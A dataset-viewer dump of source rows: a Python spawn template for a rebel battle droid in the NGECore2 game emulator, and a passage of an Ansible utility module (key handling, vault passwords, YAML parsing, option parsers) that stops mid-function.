text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
|---|---|---|---|---|---|---|
import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from resources.datatables import FactionStatus
from java.util import Vector
def addTemplate(core):
mobileTemplate = MobileTemplate()
mobileTemplate.setCreatureName('rebel_battle_droid')
mobileTemplate.setLevel(83)
mobileTemplate.setDifficulty(Difficulty.ELITE)
mobileTemplate.setMinSpawnDistance(4)
mobileTemplate.setMaxSpawnDistance(8)
mobileTemplate.setDeathblow(True)
mobileTemplate.setScale(1)
mobileTemplate.setSocialGroup("rebel")
mobileTemplate.setAssistRange(24)
mobileTemplate.setStalker(False)
mobileTemplate.setFaction("rebel")
mobileTemplate.setFactionStatus(FactionStatus.Combatant)
templates = Vector()
templates.add('object/mobile/shared_battle_droid.iff')
mobileTemplate.setTemplates(templates)
weaponTemplates = Vector()
weapontemplate = WeaponTemplate('object/weapon/ranged/carbine/shared_carbine_e5.iff', WeaponType.CARBINE, 1.0, 15, 'energy')
weaponTemplates.add(weapontemplate)
mobileTemplate.setWeaponTemplateVector(weaponTemplates)
attacks = Vector()
mobileTemplate.setDefaultAttack('rangedShot')
mobileTemplate.setAttacks(attacks)
core.spawnService.addMobileTemplate('battle_droid_rebel', mobileTemplate)
return
|
ProjectSWGCore/NGECore2
|
scripts/mobiles/generic/faction/rebel/battle_droid_rebel.py
|
Python
|
lgpl-3.0
| 1,397
| 0.029349
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import errno
import sys
import re
import os
import shlex
import yaml
import copy
import optparse
import operator
from ansible import errors
from ansible import __version__
from ansible.utils.display_functions import *
from ansible.utils.plugins import *
from ansible.utils.su_prompts import *
from ansible.utils.hashing import secure_hash, secure_hash_s, checksum, checksum_s, md5, md5s
from ansible.callbacks import display
from ansible.module_utils.splitter import split_args, unquote
from ansible.module_utils.basic import heuristic_log_sanitize
from ansible.utils.unicode import to_bytes, to_unicode
import ansible.constants as C
from . import pybook
import ast
import pprint
import time
import StringIO
import stat
import termios
import tty
import pipes
import random
import difflib
import warnings
import traceback
import getpass
import sys
import subprocess
import contextlib
from vault import VaultLib
VERBOSITY=0
MAX_FILE_SIZE_FOR_DIFF=1*1024*1024
# caching the compilation of the regex used
# to check for lookup calls within data
LOOKUP_REGEX = re.compile(r'lookup\s*\(')
PRINT_CODE_REGEX = re.compile(r'(?:{[{%]|[%}]})')
CODE_REGEX = re.compile(r'(?:{%|%})')
try:
# simplejson can be much faster if it's available
import simplejson as json
except ImportError:
import json
try:
from yaml import CSafeLoader as Loader
except ImportError:
from yaml import SafeLoader as Loader
PASSLIB_AVAILABLE = False
try:
import passlib.hash
PASSLIB_AVAILABLE = True
except:
pass
try:
import builtin
except ImportError:
import __builtin__ as builtin
KEYCZAR_AVAILABLE=False
try:
try:
# some versions of pycrypto may not have this?
from Crypto.pct_warnings import PowmInsecureWarning
except ImportError:
PowmInsecureWarning = RuntimeWarning
with warnings.catch_warnings(record=True) as warning_handler:
warnings.simplefilter("error", PowmInsecureWarning)
try:
import keyczar.errors as key_errors
from keyczar.keys import AesKey
except PowmInsecureWarning:
system_warning(
"The version of gmp you have installed has a known issue regarding " + \
"timing vulnerabilities when used with pycrypto. " + \
"If possible, you should update it (i.e. yum update gmp)."
)
warnings.resetwarnings()
warnings.simplefilter("ignore")
import keyczar.errors as key_errors
from keyczar.keys import AesKey
KEYCZAR_AVAILABLE=True
except ImportError:
pass
###############################################################
# Abstractions around keyczar
###############################################################
def key_for_hostname(hostname):
# fireball mode is an implementation of ansible firing up zeromq via SSH
# to use no persistent daemons or key management
if not KEYCZAR_AVAILABLE:
raise errors.AnsibleError("python-keyczar must be installed on the control machine to use accelerated modes")
key_path = os.path.expanduser(C.ACCELERATE_KEYS_DIR)
if not os.path.exists(key_path):
os.makedirs(key_path, mode=0700)
os.chmod(key_path, int(C.ACCELERATE_KEYS_DIR_PERMS, 8))
elif not os.path.isdir(key_path):
raise errors.AnsibleError('ACCELERATE_KEYS_DIR is not a directory.')
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_DIR_PERMS, 8):
raise errors.AnsibleError('Incorrect permissions on the private key directory. Use `chmod 0%o %s` to correct this issue, and make sure any of the keys files contained within that directory are set to 0%o' % (int(C.ACCELERATE_KEYS_DIR_PERMS, 8), C.ACCELERATE_KEYS_DIR, int(C.ACCELERATE_KEYS_FILE_PERMS, 8)))
key_path = os.path.join(key_path, hostname)
# use new AES keys every 2 hours, which means fireball must not allow running for longer either
if not os.path.exists(key_path) or (time.time() - os.path.getmtime(key_path) > 60*60*2):
key = AesKey.Generate()
fd = os.open(key_path, os.O_WRONLY | os.O_CREAT, int(C.ACCELERATE_KEYS_FILE_PERMS, 8))
fh = os.fdopen(fd, 'w')
fh.write(str(key))
fh.close()
return key
else:
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_FILE_PERMS, 8):
raise errors.AnsibleError('Incorrect permissions on the key file for this host. Use `chmod 0%o %s` to correct this issue.' % (int(C.ACCELERATE_KEYS_FILE_PERMS, 8), key_path))
fh = open(key_path)
key = AesKey.Read(fh.read())
fh.close()
return key
def encrypt(key, msg):
return key.Encrypt(msg)
def decrypt(key, msg):
try:
return key.Decrypt(msg)
except key_errors.InvalidSignatureError:
raise errors.AnsibleError("decryption failed")
###############################################################
# UTILITY FUNCTIONS FOR COMMAND LINE TOOLS
###############################################################
def read_vault_file(vault_password_file):
"""Read a vault password from a file or if executable, execute the script and
retrieve password from STDOUT
"""
if vault_password_file:
this_path = os.path.realpath(os.path.expanduser(vault_password_file))
if is_executable(this_path):
try:
# STDERR not captured to make it easier for users to prompt for input in their scripts
p = subprocess.Popen(this_path, stdout=subprocess.PIPE)
except OSError, e:
raise errors.AnsibleError("problem running %s (%s)" % (' '.join(this_path), e))
stdout, stderr = p.communicate()
vault_pass = stdout.strip('\r\n')
else:
try:
f = open(this_path, "rb")
vault_pass=f.read().strip()
f.close()
except (OSError, IOError), e:
raise errors.AnsibleError("Could not read %s: %s" % (this_path, e))
return vault_pass
else:
return None
def err(msg):
''' print an error message to stderr '''
print >> sys.stderr, msg
def exit(msg, rc=1):
''' quit with an error to stdout and a failure code '''
err(msg)
sys.exit(rc)
def jsonify(result, format=False):
''' format JSON output (uncompressed or uncompressed) '''
if result is None:
return "{}"
result2 = result.copy()
for key, value in result2.items():
if type(value) is str:
result2[key] = value.decode('utf-8', 'ignore')
indent = None
if format:
indent = 4
try:
return json.dumps(result2, sort_keys=True, indent=indent, ensure_ascii=False)
except UnicodeDecodeError:
return json.dumps(result2, sort_keys=True, indent=indent)
def write_tree_file(tree, hostname, buf):
''' write something into treedir/hostname '''
# TODO: might be nice to append playbook runs per host in a similar way
# in which case, we'd want append mode.
path = os.path.join(tree, hostname)
fd = open(path, "w+")
fd.write(buf)
fd.close()
def is_failed(result):
''' is a given JSON result a failed result? '''
return ((result.get('rc', 0) != 0) or (result.get('failed', False) in [ True, 'True', 'true']))
def is_changed(result):
''' is a given JSON result a changed result? '''
return (result.get('changed', False) in [ True, 'True', 'true'])
def check_conditional(conditional, basedir, inject, fail_on_undefined=False):
from ansible.utils import template
if conditional is None or conditional == '':
return True
if isinstance(conditional, list):
for x in conditional:
if not check_conditional(x, basedir, inject, fail_on_undefined=fail_on_undefined):
return False
return True
if not isinstance(conditional, basestring):
return conditional
conditional = conditional.replace("jinja2_compare ","")
# allow variable names
if conditional in inject and '-' not in to_unicode(inject[conditional], nonstring='simplerepr'):
conditional = to_unicode(inject[conditional], nonstring='simplerepr')
conditional = template.template(basedir, conditional, inject, fail_on_undefined=fail_on_undefined)
original = to_unicode(conditional, nonstring='simplerepr').replace("jinja2_compare ","")
# a Jinja2 evaluation that results in something Python can eval!
presented = "{%% if %s %%} True {%% else %%} False {%% endif %%}" % conditional
conditional = template.template(basedir, presented, inject)
val = conditional.strip()
if val == presented:
# the templating failed, meaning most likely a
# variable was undefined. If we happened to be
# looking for an undefined variable, return True,
# otherwise fail
if "is undefined" in conditional:
return True
elif "is defined" in conditional:
return False
else:
raise errors.AnsibleError("error while evaluating conditional: %s" % original)
elif val == "True":
return True
elif val == "False":
return False
else:
raise errors.AnsibleError("unable to evaluate conditional: %s" % original)
def is_executable(path):
'''is the given path executable?'''
return (stat.S_IXUSR & os.stat(path)[stat.ST_MODE]
or stat.S_IXGRP & os.stat(path)[stat.ST_MODE]
or stat.S_IXOTH & os.stat(path)[stat.ST_MODE])
def unfrackpath(path):
'''
returns a path that is free of symlinks, environment
variables, relative path traversals and symbols (~)
example:
'$HOME/../../var/mail' becomes '/var/spool/mail'
'''
return os.path.normpath(os.path.realpath(os.path.expandvars(os.path.expanduser(path))))
def prepare_writeable_dir(tree,mode=0777):
''' make sure a directory exists and is writeable '''
# modify the mode to ensure the owner at least
# has read/write access to this directory
mode |= 0700
# make sure the tree path is always expanded
# and normalized and free of symlinks
tree = unfrackpath(tree)
if not os.path.exists(tree):
try:
os.makedirs(tree, mode)
except (IOError, OSError), e:
raise errors.AnsibleError("Could not make dir %s: %s" % (tree, e))
if not os.access(tree, os.W_OK):
raise errors.AnsibleError("Cannot write to path %s" % tree)
return tree
def path_dwim(basedir, given):
'''
make relative paths work like folks expect.
'''
if given.startswith("'"):
given = given[1:-1]
if given.startswith("/"):
return os.path.abspath(given)
elif given.startswith("~"):
return os.path.abspath(os.path.expanduser(given))
else:
if basedir is None:
basedir = "."
return os.path.abspath(os.path.join(basedir, given))
def path_dwim_relative(original, dirname, source, playbook_base, check=True):
''' find one file in a directory one level up in a dir named dirname relative to current '''
# (used by roles code)
from ansible.utils import template
basedir = os.path.dirname(original)
if os.path.islink(basedir):
basedir = unfrackpath(basedir)
template2 = os.path.join(basedir, dirname, source)
else:
template2 = os.path.join(basedir, '..', dirname, source)
source2 = path_dwim(basedir, template2)
if os.path.exists(source2):
return source2
obvious_local_path = path_dwim(playbook_base, source)
if os.path.exists(obvious_local_path):
return obvious_local_path
if check:
raise errors.AnsibleError("input file not found at %s or %s" % (source2, obvious_local_path))
return source2 # which does not exist
def repo_url_to_role_name(repo_url):
# gets the role name out of a repo like
# http://git.example.com/repos/repo.git" => "repo"
if '://' not in repo_url and '@' not in repo_url:
return repo_url
trailing_path = repo_url.split('/')[-1]
if trailing_path.endswith('.git'):
trailing_path = trailing_path[:-4]
if trailing_path.endswith('.tar.gz'):
trailing_path = trailing_path[:-7]
if ',' in trailing_path:
trailing_path = trailing_path.split(',')[0]
return trailing_path
def role_spec_parse(role_spec):
# takes a repo and a version like
# git+http://git.example.com/repos/repo.git,v1.0
# and returns a list of properties such as:
# {
# 'scm': 'git',
# 'src': 'http://git.example.com/repos/repo.git',
# 'version': 'v1.0',
# 'name': 'repo'
# }
role_spec = role_spec.strip()
role_version = ''
default_role_versions = dict(git='master', hg='tip')
if role_spec == "" or role_spec.startswith("#"):
return (None, None, None, None)
tokens = [s.strip() for s in role_spec.split(',')]
# assume https://github.com URLs are git+https:// URLs and not
# tarballs unless they end in '.zip'
if 'github.com/' in tokens[0] and not tokens[0].startswith("git+") and not tokens[0].endswith('.tar.gz'):
tokens[0] = 'git+' + tokens[0]
if '+' in tokens[0]:
(scm, role_url) = tokens[0].split('+')
else:
scm = None
role_url = tokens[0]
if len(tokens) >= 2:
role_version = tokens[1]
if len(tokens) == 3:
role_name = tokens[2]
else:
role_name = repo_url_to_role_name(tokens[0])
if scm and not role_version:
role_version = default_role_versions.get(scm, '')
return dict(scm=scm, src=role_url, version=role_version, name=role_name)
def role_yaml_parse(role):
if 'role' in role:
# Old style: {role: "galaxy.role,version,name", other_vars: "here" }
role_info = role_spec_parse(role['role'])
if isinstance(role_info, dict):
# Warning: Slight change in behaviour here. name may be being
# overloaded. Previously, name was only a parameter to the role.
# Now it is both a parameter to the role and the name that
# ansible-galaxy will install under on the local system.
if 'name' in role and 'name' in role_info:
del role_info['name']
role.update(role_info)
else:
# New style: { src: 'galaxy.role,version,name', other_vars: "here" }
if 'github.com' in role["src"] and 'http' in role["src"] and '+' not in role["src"] and not role["src"].endswith('.tar.gz'):
role["src"] = "git+" + role["src"]
if '+' in role["src"]:
(scm, src) = role["src"].split('+')
role["scm"] = scm
role["src"] = src
if 'name' not in role:
role["name"] = repo_url_to_role_name(role["src"])
if 'version' not in role:
role['version'] = ''
if 'scm' not in role:
role['scm'] = None
return role
def json_loads(data):
''' parse a JSON string and return a data structure '''
try:
loaded = json.loads(data)
except ValueError,e:
raise errors.AnsibleError("Unable to read provided data as JSON: %s" % str(e))
return loaded
def _clean_data(orig_data, from_remote=False, from_inventory=False):
''' remove jinja2 template tags from a string '''
if not isinstance(orig_data, basestring):
return orig_data
# when the data is marked as having come from a remote, we always
# replace any print blocks (ie. {{var}}), however when marked as coming
# from inventory we only replace print blocks that contain a call to
# a lookup plugin (ie. {{lookup('foo','bar'))}})
replace_prints = from_remote or (from_inventory and '{{' in orig_data and LOOKUP_REGEX.search(orig_data) is not None)
regex = PRINT_CODE_REGEX if replace_prints else CODE_REGEX
with contextlib.closing(StringIO.StringIO(orig_data)) as data:
# these variables keep track of opening block locations, as we only
# want to replace matched pairs of print/block tags
print_openings = []
block_openings = []
for mo in regex.finditer(orig_data):
token = mo.group(0)
token_start = mo.start(0)
if token[0] == '{':
if token == '{%':
block_openings.append(token_start)
elif token == '{{':
print_openings.append(token_start)
elif token[1] == '}':
prev_idx = None
if token == '%}' and block_openings:
prev_idx = block_openings.pop()
elif token == '}}' and print_openings:
prev_idx = print_openings.pop()
if prev_idx is not None:
# replace the opening
data.seek(prev_idx, os.SEEK_SET)
data.write('{#')
# replace the closing
data.seek(token_start, os.SEEK_SET)
data.write('#}')
else:
assert False, 'Unhandled regex match'
return data.getvalue()
def _clean_data_struct(orig_data, from_remote=False, from_inventory=False):
'''
walk a complex data structure, and use _clean_data() to
remove any template tags that may exist
'''
if not from_remote and not from_inventory:
raise errors.AnsibleErrors("when cleaning data, you must specify either from_remote or from_inventory")
if isinstance(orig_data, dict):
data = orig_data.copy()
for key in data:
new_key = _clean_data_struct(key, from_remote, from_inventory)
new_val = _clean_data_struct(data[key], from_remote, from_inventory)
if key != new_key:
del data[key]
data[new_key] = new_val
elif isinstance(orig_data, list):
data = orig_data[:]
for i in range(0, len(data)):
data[i] = _clean_data_struct(data[i], from_remote, from_inventory)
elif isinstance(orig_data, basestring):
data = _clean_data(orig_data, from_remote, from_inventory)
else:
data = orig_data
return data
def parse_json(raw_data, from_remote=False, from_inventory=False, no_exceptions=False):
''' this version for module return data only '''
orig_data = raw_data
# ignore stuff like tcgetattr spewage or other warnings
data = filter_leading_non_json_lines(raw_data)
try:
results = json.loads(data)
except:
if no_exceptions:
return dict(failed=True, parsed=False, msg=raw_data)
else:
raise
if from_remote:
results = _clean_data_struct(results, from_remote, from_inventory)
return results
def serialize_args(args):
'''
Flattens a dictionary args to a k=v string
'''
module_args = ""
for (k,v) in args.iteritems():
if isinstance(v, basestring):
module_args = "%s=%s %s" % (k, pipes.quote(v), module_args)
elif isinstance(v, bool):
module_args = "%s=%s %s" % (k, str(v), module_args)
return module_args.strip()
def merge_module_args(current_args, new_args):
'''
merges either a dictionary or string of k=v pairs with another string of k=v pairs,
and returns a new k=v string without duplicates.
'''
if not isinstance(current_args, basestring):
raise errors.AnsibleError("expected current_args to be a basestring")
# we use parse_kv to split up the current args into a dictionary
final_args = parse_kv(current_args)
if isinstance(new_args, dict):
final_args.update(new_args)
elif isinstance(new_args, basestring):
new_args_kv = parse_kv(new_args)
final_args.update(new_args_kv)
return serialize_args(final_args)
def parse_yaml(data, path_hint=None):
''' convert a yaml string to a data structure. Also supports JSON, ssssssh!!!'''
stripped_data = data.lstrip()
loaded = None
if stripped_data.startswith("{") or stripped_data.startswith("["):
# since the line starts with { or [ we can infer this is a JSON document.
try:
loaded = json.loads(data)
except ValueError, ve:
if path_hint:
raise errors.AnsibleError(path_hint + ": " + str(ve))
else:
raise errors.AnsibleError(str(ve))
else:
# else this is pretty sure to be a YAML document
loaded = yaml.load(data, Loader=Loader)
return loaded
def process_common_errors(msg, probline, column):
replaced = probline.replace(" ","")
if ":{{" in replaced and "}}" in replaced:
msg = msg + """
This one looks easy to fix. YAML thought it was looking for the start of a
hash/dictionary and was confused to see a second "{". Most likely this was
meant to be an ansible template evaluation instead, so we have to give the
parser a small hint that we wanted a string instead. The solution here is to
just quote the entire value.
For instance, if the original line was:
app_path: {{ base_path }}/foo
It should be written as:
app_path: "{{ base_path }}/foo"
"""
return msg
elif len(probline) and len(probline) > 1 and len(probline) > column and probline[column] == ":" and probline.count(':') > 1:
msg = msg + """
This one looks easy to fix. There seems to be an extra unquoted colon in the line
and this is confusing the parser. It was only expecting to find one free
colon. The solution is just add some quotes around the colon, or quote the
entire line after the first colon.
For instance, if the original line was:
copy: src=file.txt dest=/path/filename:with_colon.txt
It can be written as:
copy: src=file.txt dest='/path/filename:with_colon.txt'
Or:
copy: 'src=file.txt dest=/path/filename:with_colon.txt'
"""
return msg
else:
parts = probline.split(":")
if len(parts) > 1:
middle = parts[1].strip()
match = False
unbalanced = False
if middle.startswith("'") and not middle.endswith("'"):
match = True
elif middle.startswith('"') and not middle.endswith('"'):
match = True
if len(middle) > 0 and middle[0] in [ '"', "'" ] and middle[-1] in [ '"', "'" ] and probline.count("'") > 2 or probline.count('"') > 2:
unbalanced = True
if match:
msg = msg + """
This one looks easy to fix. It seems that there is a value started
with a quote, and the YAML parser is expecting to see the line ended
with the same kind of quote. For instance:
when: "ok" in result.stdout
Could be written as:
when: '"ok" in result.stdout'
or equivalently:
when: "'ok' in result.stdout"
"""
return msg
if unbalanced:
msg = msg + """
We could be wrong, but this one looks like it might be an issue with
unbalanced quotes. If starting a value with a quote, make sure the
line ends with the same set of quotes. For instance this arbitrary
example:
foo: "bad" "wolf"
Could be written as:
foo: '"bad" "wolf"'
"""
return msg
return msg
def process_yaml_error(exc, data, path=None, show_content=True):
if hasattr(exc, 'problem_mark'):
mark = exc.problem_mark
if show_content:
if mark.line -1 >= 0:
before_probline = data.split("\n")[mark.line-1]
else:
before_probline = ''
probline = data.split("\n")[mark.line]
arrow = " " * mark.column + "^"
msg = """Syntax Error while loading YAML script, %s
Note: The error may actually appear before this position: line %s, column %s
%s
%s
%s""" % (path, mark.line + 1, mark.column + 1, before_probline, probline, arrow)
unquoted_var = None
if '{{' in probline and '}}' in probline:
if '"{{' not in probline or "'{{" not in probline:
unquoted_var = True
if not unquoted_var:
msg = process_common_errors(msg, probline, mark.column)
else:
msg = msg + """
We could be wrong, but this one looks like it might be an issue with
missing quotes. Always quote template expression brackets when they
start a value. For instance:
with_items:
- {{ foo }}
Should be written as:
with_items:
- "{{ foo }}"
"""
else:
# most likely displaying a file with sensitive content,
# so don't show any of the actual lines of yaml just the
# line number itself
msg = """Syntax error while loading YAML script, %s
The error appears to have been on line %s, column %s, but may actually
be before there depending on the exact syntax problem.
""" % (path, mark.line + 1, mark.column + 1)
else:
# No problem markers means we have to throw a generic
# "stuff messed up" type message. Sry bud.
if path:
msg = "Could not parse YAML. Check over %s again." % path
else:
msg = "Could not parse YAML."
raise errors.AnsibleYAMLValidationFailed(msg)
def parse_yaml_from_file(path, vault_password=None):
''' convert a yaml file to a data structure '''
data = None
show_content = True
try:
data = open(path).read()
except IOError:
raise errors.AnsibleError("file could not read: %s" % path)
vault = VaultLib(password=vault_password)
if vault.is_encrypted(data):
# if the file is encrypted and no password was specified,
# the decrypt call would throw an error, but we check first
# since the decrypt function doesn't know the file name
if vault_password is None:
raise errors.AnsibleError("A vault password must be specified to decrypt %s" % path)
data = vault.decrypt(data)
show_content = False
if re.match("#!.*python", data):
result = pybook.run_pybook(path)
else:
try:
result = parse_yaml(data, path_hint=path)
except yaml.YAMLError, exc:
process_yaml_error(exc, data, path, show_content)
if VERBOSITY >= 3:
display("""Structure of file "%s":\n%s\n""" % (path, pprint.pformat(result)), color='yellow')
return result
def parse_kv(args):
''' convert a string of key/value items to a dict '''
options = {}
if args is not None:
try:
vargs = split_args(args)
except ValueError, ve:
if 'no closing quotation' in str(ve).lower():
raise errors.AnsibleError("error parsing argument string, try quoting the entire line.")
else:
raise
for x in vargs:
if "=" in x:
k, v = x.split("=",1)
options[k.strip()] = unquote(v.strip())
return options
def _validate_both_dicts(a, b):
if not (isinstance(a, dict) and isinstance(b, dict)):
raise errors.AnsibleError(
"failed to combine variables, expected dicts but got a '%s' and a '%s'" % (type(a).__name__, type(b).__name__)
)
def merge_hash(a, b):
''' recursively merges hash b into a
keys from b take precedence over keys from a '''
result = {}
# we check here as well as in combine_vars() since this
# function can work recursively with nested dicts
_validate_both_dicts(a, b)
for dicts in a, b:
# next, iterate over b keys and values
for k, v in dicts.iteritems():
# if there's already such key in a
# and that key contains dict
if k in result and isinstance(result[k], dict):
# merge those dicts recursively
result[k] = merge_hash(a[k], v)
else:
# otherwise, just copy a value from b to a
result[k] = v
return result
def default(value, function):
''' syntactic sugar around lazy evaluation of defaults '''
if value is None:
return function()
return value
def _git_repo_info(repo_path):
''' returns a string containing git branch, commit id and commit date '''
result = None
if os.path.exists(repo_path):
# Check if the .git is a file. If it is a file, it means that we are in a submodule structure.
if os.path.isfile(repo_path):
try:
gitdir = yaml.safe_load(open(repo_path)).get('gitdir')
# There is a possibility the .git file to have an absolute path.
if os.path.isabs(gitdir):
repo_path = gitdir
else:
repo_path = os.path.join(repo_path[:-4], gitdir)
except (IOError, AttributeError):
return ''
f = open(os.path.join(repo_path, "HEAD"))
branch = f.readline().split('/')[-1].rstrip("\n")
f.close()
branch_path = os.path.join(repo_path, "refs", "heads", branch)
if os.path.exists(branch_path):
f = open(branch_path)
commit = f.readline()[:10]
f.close()
else:
# detached HEAD
commit = branch[:10]
branch = 'detached HEAD'
branch_path = os.path.join(repo_path, "HEAD")
date = time.localtime(os.stat(branch_path).st_mtime)
if time.daylight == 0:
offset = time.timezone
else:
offset = time.altzone
result = "({0} {1}) last updated {2} (GMT {3:+04d})".format(branch, commit,
time.strftime("%Y/%m/%d %H:%M:%S", date), offset / -36)
else:
result = ''
return result
def _gitinfo():
basedir = os.path.join(os.path.dirname(__file__), '..', '..', '..')
repo_path = os.path.join(basedir, '.git')
result = _git_repo_info(repo_path)
submodules = os.path.join(basedir, '.gitmodules')
if not os.path.exists(submodules):
return result
f = open(submodules)
for line in f:
tokens = line.strip().split(' ')
if tokens[0] == 'path':
submodule_path = tokens[2]
submodule_info =_git_repo_info(os.path.join(basedir, submodule_path, '.git'))
if not submodule_info:
submodule_info = ' not found - use git submodule update --init ' + submodule_path
result += "\n {0}: {1}".format(submodule_path, submodule_info)
f.close()
return result
def version(prog):
result = "{0} {1}".format(prog, __version__)
gitinfo = _gitinfo()
if gitinfo:
result = result + " {0}".format(gitinfo)
result = result + "\n configured module search path = %s" % C.DEFAULT_MODULE_PATH
return result
def version_info(gitinfo=False):
if gitinfo:
# expensive call, user with care
ansible_version_string = version('')
else:
ansible_version_string = __version__
ansible_version = ansible_version_string.split()[0]
ansible_versions = ansible_version.split('.')
for counter in range(len(ansible_versions)):
if ansible_versions[counter] == "":
ansible_versions[counter] = 0
try:
ansible_versions[counter] = int(ansible_versions[counter])
except:
pass
if len(ansible_versions) < 3:
for counter in range(len(ansible_versions), 3):
ansible_versions.append(0)
return {'string': ansible_version_string.strip(),
'full': ansible_version,
'major': ansible_versions[0],
'minor': ansible_versions[1],
'revision': ansible_versions[2]}
def getch():
''' read in a single character '''
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def sanitize_output(arg_string):
''' strips private info out of a string '''
private_keys = ('password', 'login_password')
output = []
for part in arg_string.split():
try:
(k, v) = part.split('=', 1)
except ValueError:
v = heuristic_log_sanitize(part)
output.append(v)
continue
if k in private_keys:
v = 'VALUE_HIDDEN'
else:
v = heuristic_log_sanitize(v)
output.append('%s=%s' % (k, v))
output = ' '.join(output)
return output
####################################################################
# option handling code for /usr/bin/ansible and ansible-playbook
# below this line
class SortedOptParser(optparse.OptionParser):
'''Optparser which sorts the options by opt before outputting --help'''
def format_help(self, formatter=None):
self.option_list.sort(key=operator.methodcaller('get_opt_string'))
return optparse.OptionParser.format_help(self, formatter=None)
def increment_debug(option, opt, value, parser):
global VERBOSITY
VERBOSITY += 1
def base_parser(constants=C, usage="", output_opts=False, runas_opts=False,
async_opts=False, connect_opts=False, subset_opts=False, check_opts=False, diff_opts=False):
''' create an options parser for any ansible script '''
parser = SortedOptParser(usage, version=version("%prog"))
parser.add_option('-v','--verbose', default=False, action="callback",
callback=increment_debug, help="verbose mode (-vvv for more, -vvvv to enable connection debugging)")
parser.add_option('-f','--forks', dest='forks', default=constants.DEFAULT_FORKS, type='int',
help="specify number of parallel processes to use (default=%s)" % constants.DEFAULT_FORKS)
parser.add_option('-i', '--inventory-file', dest='inventory',
help="specify inventory host file (default=%s)" % constants.DEFAULT_HOST_LIST,
default=constants.DEFAULT_HOST_LIST)
parser.add_option('-e', '--extra-vars', dest="extra_vars", action="append",
help="set additional variables as key=value or YAML/JSON", default=[])
parser.add_option('-u', '--user', default=constants.DEFAULT_REMOTE_USER, dest='remote_user',
help='connect as this user (default=%s)' % constants.DEFAULT_REMOTE_USER)
parser.add_option('-k', '--ask-pass', default=False, dest='ask_pass', action='store_true',
help='ask for SSH password')
parser.add_option('--private-key', default=constants.DEFAULT_PRIVATE_KEY_FILE, dest='private_key_file',
help='use this file to authenticate the connection')
parser.add_option('--ask-vault-pass', default=False, dest='ask_vault_pass', action='store_true',
help='ask for vault password')
parser.add_option('--vault-password-file', default=constants.DEFAULT_VAULT_PASSWORD_FILE,
dest='vault_password_file', help="vault password file")
parser.add_option('--list-hosts', dest='listhosts', action='store_true',
help='outputs a list of matching hosts; does not execute anything else')
parser.add_option('-M', '--module-path', dest='module_path',
help="specify path(s) to module library (default=%s)" % constants.DEFAULT_MODULE_PATH,
default=None)
if subset_opts:
parser.add_option('-l', '--limit', default=constants.DEFAULT_SUBSET, dest='subset',
help='further limit selected hosts to an additional pattern')
parser.add_option('-T', '--timeout', default=constants.DEFAULT_TIMEOUT, type='int',
dest='timeout',
help="override the SSH timeout in seconds (default=%s)" % constants.DEFAULT_TIMEOUT)
if output_opts:
parser.add_option('-o', '--one-line', dest='one_line', action='store_true',
help='condense output')
parser.add_option('-t', '--tree', dest='tree', default=None,
help='log output to this directory')
if runas_opts:
# priv user defaults to root later on to enable detecting when this option was given here
parser.add_option('-K', '--ask-sudo-pass', default=constants.DEFAULT_ASK_SUDO_PASS, dest='ask_sudo_pass', action='store_true',
help='ask for sudo password (deprecated, use become)')
parser.add_option('--ask-su-pass', default=constants.DEFAULT_ASK_SU_PASS, dest='ask_su_pass', action='store_true',
help='ask for su password (deprecated, use become)')
parser.add_option("-s", "--sudo", default=constants.DEFAULT_SUDO, action="store_true", dest='sudo',
help="run operations with sudo (nopasswd) (deprecated, use become)")
parser.add_option('-U', '--sudo-user', dest='sudo_user', default=None,
help='desired sudo user (default=root) (deprecated, use become)')
parser.add_option('-S', '--su', default=constants.DEFAULT_SU, action='store_true',
help='run operations with su (deprecated, use become)')
parser.add_option('-R', '--su-user', default=None,
help='run operations with su as this user (default=%s) (deprecated, use become)' % constants.DEFAULT_SU_USER)
# consolidated privilege escalation (become)
parser.add_option("-b", "--become", default=constants.DEFAULT_BECOME, action="store_true", dest='become',
help="run operations with become (nopasswd implied)")
parser.add_option('--become-method', dest='become_method', default=constants.DEFAULT_BECOME_METHOD, type='string',
help="privilege escalation method to use (default=%s), valid choices: [ %s ]" % (constants.DEFAULT_BECOME_METHOD, ' | '.join(constants.BECOME_METHODS)))
parser.add_option('--become-user', default=None, dest='become_user', type='string',
help='run operations as this user (default=%s)' % constants.DEFAULT_BECOME_USER)
parser.add_option('--ask-become-pass', default=False, dest='become_ask_pass', action='store_true',
help='ask for privilege escalation password')
if connect_opts:
parser.add_option('-c', '--connection', dest='connection',
default=constants.DEFAULT_TRANSPORT,
help="connection type to use (default=%s)" % constants.DEFAULT_TRANSPORT)
if async_opts:
parser.add_option('-P', '--poll', default=constants.DEFAULT_POLL_INTERVAL, type='int',
dest='poll_interval',
help="set the poll interval if using -B (default=%s)" % constants.DEFAULT_POLL_INTERVAL)
parser.add_option('-B', '--background', dest='seconds', type='int', default=0,
help='run asynchronously, failing after X seconds (default=N/A)')
if check_opts:
parser.add_option("-C", "--check", default=False, dest='check', action='store_true',
help="don't make any changes; instead, try to predict some of the changes that may occur"
)
if diff_opts:
parser.add_option("-D", "--diff", default=False, dest='diff', action='store_true',
help="when changing (small) files and templates, show the differences in those files; works great with --check"
)
return parser
def parse_extra_vars(extra_vars_opts, vault_pass):
extra_vars = {}
for extra_vars_opt in extra_vars_opts:
extra_vars_opt = to_unicode(extra_vars_opt)
if extra_vars_opt.startswith(u"@"):
